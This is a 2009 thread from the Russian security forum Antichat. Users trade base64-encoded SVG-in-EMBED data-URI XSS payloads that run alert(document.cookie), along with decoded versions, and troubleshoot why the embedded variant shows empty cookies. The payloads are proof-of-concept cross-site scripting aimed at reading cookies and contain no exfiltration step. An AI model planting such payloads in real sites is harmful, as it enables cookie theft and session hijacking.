Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Алерт и embed (https://forum.antichat.xyz/showthread.php?t=111030)

wildshaman 14.03.2009 14:31

Алерт и embed
 
Имется такой код:
Код:

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjxzY3JpcHQgdHlwZT0idGV4dC9lY21hc2NyaXB0Ij5hbGVydCgiQW50aUNoYXQiKTwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
Вставляю его на сайт, он алертом выводит "AntiChat".
Меняю код на
Код:

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjxzY3JpcHQgdHlwZT0idGV4dC9lY21hc2NyaXB0Ij5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+PC9zdmc+" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
Он должен алертом выводить куки, но выводит пустую строку, хотя куки точно есть. Что я делаю не так, как вывести куки?

Pashkela 14.03.2009 14:54

У меня всё выводит:

2 вариант:
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="0" height="0"><script type="text/ecmascript">alert(document.cookie)</script></svg>

1-м вариант:

<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="0" height="0"><script type="text/ecmascript">alert("AntiChat")</script></svg>

вывод алерта по первому варианту:

txtMainTab=Timeline; chkSliderOptionsPanel=true

wildshaman 14.03.2009 15:01

Цитата:

Сообщение от Pashkela
У меня всё выводит:

просто
Код:

<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="0" height="0"><script type="text/ecmascript">alert(document.cookie)</script></svg>
у меня выводит куки, а мне надо запихать это в embed, как я и показал во втором варианте, но так, чтобы он куки показывал, а не пустую строку....

wildshaman 14.03.2009 15:34

Если зайти на любой сайт, где установлены куки, и ввести в поле для урла
Код:

data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjxzY3JpcHQgdHlwZT0idGV4dC9lY21hc2NyaXB0Ij5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+PC9zdmc+
, то должен выскочить алерт с куками. А выскакивает пустой алерт =(
Всю голову уже поломал)

Deathdreams 14.03.2009 15:45

попробуй поставь сразу,после:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
Pashkela правильно сказал,все выводит
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="0" height="0"><script type="text/ecmascript">alert(document.cookie)</script></svg>

wildshaman 14.03.2009 15:48

Цитата:

Сообщение от Deathdreams
попробуй поставь сразу,после:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
Pashkela правильно сказал,все выводит
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="0" height="0"><script type="text/ecmascript">alert(document.cookie)</script></svg>

Да, если писать на страницу в раскодированном виде (как ты напсиал), то да, выводятся куки. А если закодировать и вставить в ембед (как мне надо) - то не выводятся куки. В этом-то и трабла!


Время: 03:11